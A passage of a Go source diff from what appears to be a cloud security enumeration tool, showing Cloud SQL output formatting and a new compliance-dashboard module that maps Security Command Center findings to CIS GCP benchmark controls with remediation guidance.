!m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudSQLModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var 
lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudSQLOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudSQLModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing 
output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the table header for Cloud SQL instances +func (m *CloudSQLModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Database", + "Tier", + "Public IP", + "Private IP", + "SSL", + "Backups", + "PITR", + "Encrypt", + "IAM Auth", + "PwdPolicy", + "HA", + "Auth Network", + "CIDR", + "Public Access", + } +} + +// instancesToTableBody converts instances to table body rows +func (m *CloudSQLModule) instancesToTableBody(instances []CloudSQLService.SQLInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + // Format encryption type + encryptionDisplay := instance.EncryptionType + if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { + encryptionDisplay = "Google" + } + + // Format public/private IPs + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + privateIP := instance.PrivateIP + if privateIP == "" { + privateIP = "-" + } + + // If instance has authorized networks, create one row per network + if len(instance.AuthorizedNetworks) > 0 { + for _, network := range instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + + networkName := network.Name + if networkName == "" { + networkName = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + networkName, + network.Value, + publicAccess, + }) + } + } else { + // 
Instance has no authorized networks - single row + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + "-", + "-", + "-", + }) + } + } + return body +} diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go new file mode 100644 index 00000000..e081ed08 --- /dev/null +++ b/gcp/commands/compliancedashboard.go @@ -0,0 +1,1986 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" + +var GCPComplianceDashboardCommand = &cobra.Command{ + Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + Aliases: []string{"compliance", "cis", "benchmark"}, + Hidden: true, + Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", + Long: `Assess regulatory compliance posture against industry standards and security frameworks. 
+ +Features: +- CIS GCP Foundation Benchmark assessment +- PCI-DSS control mapping +- SOC 2 control coverage analysis +- HIPAA compliance checks +- ISO 27001 control mapping +- Security Command Center compliance findings integration +- Organization policy compliance analysis +- Remediation guidance for failed controls + +Supported Frameworks: +- CIS GCP Foundation Benchmark v1.3/v2.0 +- PCI-DSS v3.2.1/v4.0 +- SOC 2 Type II +- HIPAA Security Rule +- ISO 27001:2013 +- NIST CSF + +Requires appropriate IAM permissions: +- roles/securitycenter.findingsViewer +- roles/orgpolicy.policyViewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPComplianceDashboardCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ComplianceControl struct { + ControlID string + Framework string + ControlName string + Description string + Severity string // CRITICAL, HIGH, MEDIUM, LOW + Status string // PASS, FAIL, MANUAL, NOT_APPLICABLE + ResourceCount int + PassCount int + FailCount int + ProjectID string + Details string + Remediation string + References []string +} + +type ComplianceFramework struct { + Name string + Version string + TotalControls int + PassedControls int + FailedControls int + ManualControls int + NAControls int + Score float64 +} + +type ComplianceFailure struct { + ControlID string + Framework string + ControlName string + Severity string + ResourceName string + ResourceType string + ProjectID string + Details string + Remediation string + RiskScore int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ComplianceDashboardModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Controls []ComplianceControl + Frameworks map[string]*ComplianceFramework + Failures []ComplianceFailure + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Cached data for compliance checks + orgPolicies map[string]bool + sccFindings 
map[string][]string // category -> resources + projectMetadata map[string]map[string]interface{} +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ComplianceDashboardOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComplianceDashboardOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComplianceDashboardOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPComplianceDashboardCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ComplianceDashboardModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Controls: []ComplianceControl{}, + Frameworks: make(map[string]*ComplianceFramework), + Failures: []ComplianceFailure{}, + LootMap: make(map[string]*internal.LootFile), + orgPolicies: make(map[string]bool), + sccFindings: make(map[string][]string), + projectMetadata: make(map[string]map[string]interface{}), + } + + // Initialize loot files + module.initializeLootFiles() + + // Initialize frameworks + module.initializeFrameworks() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Framework Initialization +// ------------------------------ +func (m *ComplianceDashboardModule) initializeFrameworks() { + m.Frameworks["CIS-GCP-1.3"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "1.3", + } + m.Frameworks["CIS-GCP-2.0"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "2.0", + } + m.Frameworks["PCI-DSS-4.0"] = &ComplianceFramework{ + Name: "PCI-DSS", + Version: "4.0", + } + m.Frameworks["SOC2"] = &ComplianceFramework{ + Name: "SOC 2 Type II", + 
Version: "2017", + } + m.Frameworks["HIPAA"] = &ComplianceFramework{ + Name: "HIPAA Security Rule", + Version: "2013", + } + m.Frameworks["ISO27001"] = &ComplianceFramework{ + Name: "ISO 27001", + Version: "2013", + } + m.Frameworks["NIST-CSF"] = &ComplianceFramework{ + Name: "NIST Cybersecurity Framework", + Version: "1.1", + } +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Assessing compliance posture against security frameworks...", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + // Step 1: Gather SCC findings for compliance mapping + m.gatherSCCFindings(ctx, logger) + + // Step 2: Gather organization policies + m.gatherOrgPolicies(ctx, logger) + + // Step 3: Run CIS GCP Benchmark checks + m.runCISBenchmarkChecks(ctx, logger) + + // Step 4: Map to other frameworks + m.mapToFrameworks() + + // Check results + totalControls := len(m.Controls) + if totalControls == 0 { + logger.InfoM("No compliance controls could be assessed", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + logger.InfoM("This could mean: (1) Insufficient permissions, (2) No resources to assess", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + return + } + + // Count by status + passCount := 0 + failCount := 0 + manualCount := 0 + for _, c := range m.Controls { + switch c.Status { + case "PASS": + passCount++ + case "FAIL": + failCount++ + case "MANUAL": + manualCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Assessed %d compliance control(s): %d PASS, %d FAIL, %d MANUAL", + totalControls, passCount, failCount, manualCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + if failCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d compliance control(s) failed", failCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Data Gathering +// ------------------------------ +func (m 
*ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { + client, err := securitycenter.NewClient(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Security Command Center client") + return + } + defer client.Close() + + for _, projectID := range m.ProjectIDs { + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, + } + + it := client.ListFindings(ctx, req) + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + if result.Finding != nil { + category := result.Finding.Category + m.mu.Lock() + m.sccFindings[category] = append(m.sccFindings[category], result.Finding.ResourceName) + m.mu.Unlock() + } + } + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Gathered %d SCC finding categories", len(m.sccFindings)), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } +} + +func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Resource Manager client") + return + } + + for _, projectID := range m.ProjectIDs { + project, err := crmService.Projects.Get(projectID).Do() + if err != nil { + continue + } + + m.mu.Lock() + m.projectMetadata[projectID] = map[string]interface{}{ + "name": project.Name, + "parent": project.Parent, + "labels": project.Labels, + } + m.mu.Unlock() + } +} + +// ------------------------------ +// CIS Benchmark Checks +// ------------------------------ +func (m *ComplianceDashboardModule) runCISBenchmarkChecks(ctx context.Context, logger internal.Logger) { + // CIS GCP Foundation Benchmark v1.3 / v2.0 Controls + + // Section 1: Identity and Access 
Management + m.checkCIS_1_1_ServiceAccountAdmin(ctx, logger) + m.checkCIS_1_2_ServiceAccountUser(ctx, logger) + m.checkCIS_1_3_ServiceAccountKeys(ctx, logger) + m.checkCIS_1_4_ServiceAccountTokenCreator(ctx, logger) + m.checkCIS_1_5_SeperationOfDuties(ctx, logger) + m.checkCIS_1_6_KMSRoles(ctx, logger) + m.checkCIS_1_7_SAKeyRotation(ctx, logger) + m.checkCIS_1_8_UserManagedKeys(ctx, logger) + m.checkCIS_1_9_CloudKMSSeparation(ctx, logger) + m.checkCIS_1_10_APIKeys(ctx, logger) + + // Section 2: Logging and Monitoring + m.checkCIS_2_1_CloudAuditLogging(ctx, logger) + m.checkCIS_2_2_LogSinks(ctx, logger) + m.checkCIS_2_3_RetentionPolicy(ctx, logger) + m.checkCIS_2_4_ProjectOwnership(ctx, logger) + m.checkCIS_2_5_AuditConfigChanges(ctx, logger) + m.checkCIS_2_6_SQLInstanceChanges(ctx, logger) + m.checkCIS_2_7_NetworkChanges(ctx, logger) + m.checkCIS_2_8_RouteChanges(ctx, logger) + m.checkCIS_2_9_FirewallChanges(ctx, logger) + m.checkCIS_2_10_VPCChanges(ctx, logger) + m.checkCIS_2_11_SQLServerAccessChanges(ctx, logger) + + // Section 3: Networking + m.checkCIS_3_1_DefaultNetwork(ctx, logger) + m.checkCIS_3_2_LegacyNetworks(ctx, logger) + m.checkCIS_3_3_DNSSEC(ctx, logger) + m.checkCIS_3_4_RSASHA1(ctx, logger) + m.checkCIS_3_5_RDPAccess(ctx, logger) + m.checkCIS_3_6_SSHAccess(ctx, logger) + m.checkCIS_3_7_FlowLogs(ctx, logger) + m.checkCIS_3_8_SSLPolicy(ctx, logger) + m.checkCIS_3_9_FirewallLogging(ctx, logger) + m.checkCIS_3_10_VPCNetworkPeering(ctx, logger) + + // Section 4: Virtual Machines + m.checkCIS_4_1_DefaultServiceAccount(ctx, logger) + m.checkCIS_4_2_BlockProjectWideSSH(ctx, logger) + m.checkCIS_4_3_OSLogin(ctx, logger) + m.checkCIS_4_4_SerialPortDisabled(ctx, logger) + m.checkCIS_4_5_IPForwarding(ctx, logger) + m.checkCIS_4_6_PublicIP(ctx, logger) + m.checkCIS_4_7_ShieldedVM(ctx, logger) + m.checkCIS_4_8_ComputeEncryption(ctx, logger) + m.checkCIS_4_9_ConfidentialComputing(ctx, logger) + + // Section 5: Storage + m.checkCIS_5_1_UniformBucketAccess(ctx, 
logger) + m.checkCIS_5_2_PublicBuckets(ctx, logger) + + // Section 6: Cloud SQL + m.checkCIS_6_1_SQLPublicIP(ctx, logger) + m.checkCIS_6_2_SQLAuthorizedNetworks(ctx, logger) + m.checkCIS_6_3_SQLSSLRequired(ctx, logger) + m.checkCIS_6_4_SQLNoPublicIP(ctx, logger) + m.checkCIS_6_5_SQLBackups(ctx, logger) + m.checkCIS_6_6_SQLContainedDB(ctx, logger) + m.checkCIS_6_7_SQLCrossDBAOwnership(ctx, logger) + + // Section 7: BigQuery + m.checkCIS_7_1_BigQueryCMEK(ctx, logger) + m.checkCIS_7_2_BigQueryTableCMEK(ctx, logger) + m.checkCIS_7_3_BigQueryDatasetPublic(ctx, logger) +} + +// CIS Control Check Implementations +func (m *ComplianceDashboardModule) checkCIS_1_1_ServiceAccountAdmin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Admin is not assigned at project level", + Description: "The Service Account Admin role should not be assigned at the project level", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review IAM bindings and remove Service Account Admin role at project level", + References: []string{"https://cloud.google.com/iam/docs/understanding-roles"}, + } + + // Check SCC findings for this category + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_ADMIN_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account Admin role", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "iam-binding", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_2_ServiceAccountUser(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure 
Service Account User is not assigned at project level", + Description: "Service Account User role grants impersonation capabilities and should be restricted", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Remove Service Account User role at project level, assign at service account level instead", + References: []string{"https://cloud.google.com/iam/docs/service-accounts"}, + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_USER_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account User role", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_3_ServiceAccountKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are not created", + Description: "User-managed keys are a security risk and should be avoided", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use workload identity or short-lived tokens instead of user-managed keys", + References: []string{"https://cloud.google.com/iam/docs/best-practices-for-securing-service-accounts"}, + } + + if findings, ok := m.sccFindings["USER_MANAGED_SERVICE_ACCOUNT_KEY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d user-managed service account keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "service-account-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_4_ServiceAccountTokenCreator(ctx context.Context, 
logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Token Creator is properly scoped", + Description: "Token Creator role allows identity impersonation and should be carefully controlled", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review and restrict Service Account Token Creator role assignments", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_5_SeperationOfDuties(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure separation of duties is enforced", + Description: "Users should not have both Service Account Admin and Service Account User roles", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement separation of duties by assigning roles to different principals", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_6_KMSRoles(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure KMS encryption and decryption roles are separated", + Description: "KMS admin should not have encryption/decryption access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Separate KMS administration from encryption/decryption operations", + } + + if findings, ok := m.sccFindings["KMS_ROLE_SEPARATION"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_7_SAKeyRotation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.7", + Framework: "CIS-GCP-2.0", + 
ControlName: "Ensure service account keys are rotated within 90 days", + Description: "Service account keys should be rotated regularly", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement key rotation policy or use short-lived credentials", + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_KEY_NOT_ROTATED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d service account keys older than 90 days", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_8_UserManagedKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are reviewed", + Description: "All user-managed keys should be inventoried and reviewed", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Document and regularly review all user-managed service account keys", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_9_CloudKMSSeparation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud KMS cryptokeys are not anonymously or publicly accessible", + Description: "KMS keys should not be accessible to allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from Cloud KMS keys", + } + + if findings, ok := m.sccFindings["KMS_KEY_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible KMS keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "kms-key", 
m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_10_APIKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure API keys are restricted to only APIs and hosts that need them", + Description: "API keys should have appropriate restrictions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Apply API and host restrictions to all API keys", + } + + if findings, ok := m.sccFindings["API_KEY_NOT_RESTRICTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d unrestricted API keys", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 2: Logging and Monitoring Controls +func (m *ComplianceDashboardModule) checkCIS_2_1_CloudAuditLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Audit Logging is configured properly", + Description: "Cloud Audit Logs should be enabled for all services", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable Data Access audit logs for all services", + } + + if findings, ok := m.sccFindings["AUDIT_LOGGING_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d services with disabled audit logging", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_2_LogSinks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.2", + 
Framework: "CIS-GCP-2.0", + ControlName: "Ensure that sinks are configured for all log entries", + Description: "Log sinks should be configured to export copies of all log entries", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create a sink that exports copies of all log entries", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_3_RetentionPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log bucket has retention policy with appropriate duration", + Description: "Log buckets should have retention policies configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Configure retention policies on all log storage buckets", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_4_ProjectOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for project ownership changes", + Description: "Alerts for project ownership changes should be configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for project ownership assignment changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_5_AuditConfigChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for audit configuration changes", + Description: "Monitor changes to audit configurations", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics for audit configuration changes", + } + m.mu.Lock() + m.Controls = 
append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_6_SQLInstanceChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for SQL instance configuration changes", + Description: "Monitor Cloud SQL instance configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_7_NetworkChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network changes", + Description: "Monitor VPC network creation, deletion, and modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC network changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_8_RouteChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC route changes", + Description: "Monitor VPC route modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC route changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_9_FirewallChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for firewall rule changes", + Description: "Monitor firewall rule creation, modification, and deletion", + Severity: 
"MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for firewall rule changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_10_VPCChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network firewall changes", + Description: "Monitor VPC firewall changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC firewall changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_11_SQLServerAccessChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.11", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for Cloud SQL Server access changes", + Description: "Monitor Cloud SQL authorization changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL authorization modifications", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 3: Networking Controls +func (m *ComplianceDashboardModule) checkCIS_3_1_DefaultNetwork(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default network does not exist", + Description: "The default network should be deleted as it has overly permissive firewall rules", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Delete the default network and create custom VPC networks", + } + + if findings, ok := m.sccFindings["DEFAULT_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d projects with default network", len(findings)) + + for _, resource := range 
